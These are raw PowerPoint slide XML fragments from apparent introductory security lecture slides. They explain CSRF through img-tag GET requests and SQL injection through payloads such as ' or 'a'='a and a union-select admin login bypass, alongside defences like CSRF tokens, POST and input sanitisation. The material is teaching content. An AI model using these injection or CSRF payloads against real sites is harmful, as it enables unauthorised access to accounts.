              <a:t>Exists…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FA1F0-B139-BD5A-AE63-EE8819D1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29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95872-49F4-D84F-8788-B13884C6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  <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(CSRF)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FBE2-8116-CDA3-109C-A059BD45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CSRF is an attack that attacker may misuse user’s cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOT caught by Same-Origin Policy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It does not steal the cookie of the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It does not inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the victim website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can it be possible???????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E1D55-9EE4-4E82-C8A4-757D722F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63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A018-A96B-069D-EBC1-77DBAAFC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the &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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D8DC-8C4D-2294-F8B1-74BC6D680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=https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.bing.com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=aldo%20shoes /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will send a HTTP GET request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bing.com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F87B-7B3A-6A66-81C6-0639E0AF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AC9A6E2-4EA0-CBE3-B926-E3D606F41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6" y="2710090"/>
            <a:ext cx="5092700" cy="2133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983115A-E9A7-DFD3-1FCA-BA80A5C7F4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9964" y="3614893"/>
            <a:ext cx="7772400" cy="33927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37A190-DA3D-2BF8-4E2D-7B57DB7F0B3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4898571" y="3069771"/>
            <a:ext cx="3951515" cy="224151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536EF6-402D-4FFD-2494-1753CC5D2B48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8749425" y="2517721"/>
            <a:ext cx="2729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It uses the Browser’s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bing.com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A018-A96B-069D-EBC1-77DBAAFC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D8DC-8C4D-2294-F8B1-74BC6D680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make victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically connect to any website using &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can even write that in our own website/homepage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This capability let attackers send any GET request to website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET is a HTTP method that sends parameters in URL, e.g.,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctf.unexploitable.systems/login?id=blue9057&amp;pw=stongpassword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can connect to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ctf.unexploitable.systems/logout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO!!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8F87B-7B3A-6A66-81C6-0639E0AF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51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EF9C-9D5B-1AE5-E64E-24957636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Attackers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7823-ADF9-09F9-702E-AE747D14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Attackers can send any kind of GET request to any website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the victim has an active session (i.e., valid Cookie) to the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then the browser will automatically re-use the cookie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CTFd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Logout works?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The cs370 website hideously send a GET request to /logout to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctf.unexploitable.systems/logout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Via &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web browser will use the stored cookie/session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server sees the valid cookie, let’s logout!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4B142-2385-94A7-905F-CDBA1373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86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EF9C-9D5B-1AE5-E64E-24957636F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Attackers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7823-ADF9-09F9-702E-AE747D14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Attackers can send any kind of GET request to any website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the victim has an active session (i.e., valid Cookie) to the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then the browser will automatically re-use the cookie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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CTFd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Logout works?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The cs370 website hideously send a GET request to /logout to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctf.unexploitable.systems/logout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Via &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web browser will use the stored cookie/session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server sees the valid cookie, let’s logout!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4B142-2385-94A7-905F-CDBA1373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289587-61EF-4E5C-7365-62CC4D58A4E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3641271"/>
            <a:ext cx="5774871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Implication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It was logout function for the example but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it could be any other operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g., sending money) that could be targeted for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the CSRF attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26130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E06E-3193-71F2-E6CA-E16850F2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Attacks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D4B9-4943-06ED-BD7E-599324FEC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write your own website, there is no restrictions in doing that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lure victims to visit your website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No need to steal the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No need to find vulnerabilities to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code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Sooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> easy to launch…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Soooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dangerous…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23286-9914-3AD6-83D2-65FC3578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59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F4EE-9395-C7FC-BACD-BEA9F6F6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Search Engine Result</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with CSRF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49EF-A751-C866-5C65-204BDAC2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Bing search engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.bing.com/search?q=shoes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will search shoes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D3CCB-D283-93EA-4295-3509BA3A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66878BF-CD56-3538-171D-BD7AE5EA5E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1322614"/>
            <a:ext cx="4560601" cy="553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63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F4EE-9395-C7FC-BACD-BEA9F6F6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Engines are Customizing Search Result Based on User’s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49EF-A751-C866-5C65-204BDAC2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Bing search engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose user searches Nike, Asics, Aldo shoes multiple times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They rank up those brands…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D3CCB-D283-93EA-4295-3509BA3A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45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F4EE-9395-C7FC-BACD-BEA9F6F6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Attackers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749EF-A751-C866-5C65-204BDAC2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 a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write a popular blog post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insert tags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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.bing.com/search?q=NIKE shoes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /&gt;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For 10 times..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D3CCB-D283-93EA-4295-3509BA3A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49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1065-43DA-E846-DC50-2F355403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(in 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7F12C-C508-E540-9A43-017A4F4E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0FCC-93D5-6C38-E47E-CD8489A2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08FEE-47EE-4B49-65A2-2D680897B8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926" y="681036"/>
            <a:ext cx="6743745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2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5ECE-8724-9DF9-82A6-51C190C7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Access for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9AC81-F3AE-B593-CE80-7FCE6786A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Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(SQL examples: https://www.w3schools.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sql_examples.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT (username, password) FROM users WHERE username = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000DFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue9057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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHA256(secret + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>my-super-secure-password!@#$11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user sends the plaintext password to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But the password is never stored in the DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if the attackers know the secret, they have to inverse SHA256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To get the plaintext password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99766-335E-3A62-B765-A262F8D4E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97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1065-43DA-E846-DC50-2F355403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paper for the details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="Diagram&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5827C587-8A44-CE17-4930-6E4829ECF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32" y="1825625"/>
            <a:ext cx="845473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0FCC-93D5-6C38-E47E-CD8489A2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38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A54C-BC95-B86D-3021-FA7D93F6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Defeat CSRF attack?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FD5D-F294-6173-641E-AB08BB875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71738" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use POST method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tag, we can only issue GET request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET method passes parameters on the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctf.unexploitable.systems/login?username=blue9057&amp;password=asdfasdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP/1.0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POST method passes parameters in the request body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ctf.unexploitable.systems/login HTTP/1.0</a:t>
            </a:r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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=blue9057&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asdfasdf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4A33B-0183-0401-4471-A67E3833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20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A54C-BC95-B86D-3021-FA7D93F6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Defeat CSRF attack?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FD5D-F294-6173-641E-AB08BB875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71738" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use CSRF Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store CSRF token = 23948902382903902aaab98a988aba (some random value)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the Cookie, visible to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> space (no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every GET request the client makes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server requires matching CSRF token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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctf.unexploitable.systems/logout?CSRFtoken=23948902382903902aaab98a988aba</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server verifies the token value with the Cookie value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can never know the Cookie/CSRF Token value…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4A33B-0183-0401-4471-A67E3833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8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D19B-394F-9431-885E-5962F395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Attack: SQL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95642-B6EC-B20D-0856-542CCFD3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supply ‘or ‘a’=‘a as a password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT (username, password) FROM users WHERE username = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000DFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue9057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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and password = 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>
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ or ‘a’ =‘a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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can bypass password checking logic by injecting malicious data to the database SQL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43C54-D067-48EF-7501-64D29399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A humorous webcomic by xkcd about the potential effect of SQL injection">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51BC2D35-B7E5-600F-A87F-ECC7D7AC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6900" y="4117975"/>
            <a:ext cx="845820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5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045A-9C77-3661-E735-DFDEF866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Defeat SQL injection?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B5480-BFC8-4A38-C294-D5A17554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Problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The fixed query string and the client inputs are mixed..</a:t>
            </a:r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SELECT (username, password) FROM users WHERE username = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue9057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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and password = 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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ or ‘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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ =‘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pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT (username, password) FROM users WHERE username = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue9057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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and password = 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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ union select ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, ‘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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We should never let those blue strings (client’s input) interpreted as a query string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It must be interpreted as a string value (yellow-marked)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18F77-3685-E1ED-A651-D4CD7BA51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7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6E79-04FF-916A-CD02-FD57EECA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Defense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625E-CD3C-0B26-8CAC-741EC019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Sanitize input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if we remove/escape all ’s?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., 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SELECT (username, password) FROM users WHERE username = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue9057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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and password = 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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’ or ‘‘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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’ =‘‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC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’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F1AC-3217-CB16-61C9-BCCB5CB8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A humorous webcomic by xkcd about the potential effect of SQL injection">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464FD856-EC12-F549-571D-31BA5E58A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75"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="1397794"/>
            <a:ext cx="4561114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5E54C79-D876-F177-A9BE-73E739A8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3613944"/>
            <a:ext cx="5181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75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7097</TotalTime>
  <Words>3363</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>582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Kannada MN</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CS 370 Introduction to Security</vt:lpstr>
      <vt:lpstr>Hashed-password</vt:lpstr>
      <vt:lpstr>Web Server Authentication</vt:lpstr>
      <vt:lpstr>Web Password Authentication</vt:lpstr>
      <vt:lpstr>Server Logic</vt:lpstr>
      <vt:lpstr>Database Access for Password</vt:lpstr>
      <vt:lpstr>Web Attack: SQL injection</vt:lpstr>
      <vt:lpstr>How to Defeat SQL injection?</vt:lpstr>
      <vt:lpstr>SQL Injection Defense</vt:lpstr>
      <vt:lpstr>Database Frameworks Provides a Good APIs for Sanitizing Inputs</vt:lpstr>
      <vt:lpstr>What Does These Input Sanitization Do?</vt:lpstr>
      <vt:lpstr>How Can We Manage Login Status?</vt:lpstr>
      <vt:lpstr>Web Password Authentication</vt:lpstr>
      <vt:lpstr>Web Password Authentication</vt:lpstr>
      <vt:lpstr>Web Password Authentication</vt:lpstr>
      <vt:lpstr>Cookie</vt:lpstr>
      <vt:lpstr>Cookie</vt:lpstr>
      <vt:lpstr>Cookie Example: CTFd at ctf.unexploitable.systems</vt:lpstr>
      <vt:lpstr>How Our Scoring Server (CTFd) Do?</vt:lpstr>
      <vt:lpstr>How Our Scoring Server (CTFd) Do?</vt:lpstr>
      <vt:lpstr>When Users are Connecting to  CTFd…</vt:lpstr>
      <vt:lpstr>How to Logout?</vt:lpstr>
      <vt:lpstr>What If a Cookie is Stolen?</vt:lpstr>
      <vt:lpstr>Session Hijacking Attacks</vt:lpstr>
      <vt:lpstr>Session Hijacking Demo with</vt:lpstr>
      <vt:lpstr>Other Web Security Isseus</vt:lpstr>
      <vt:lpstr>Web 1.0</vt:lpstr>
      <vt:lpstr>Dynamic Features Cannot Be Supported by Web 1.0</vt:lpstr>
      <vt:lpstr>Web 2.0</vt:lpstr>
      <vt:lpstr>How to Get New Data?</vt:lpstr>
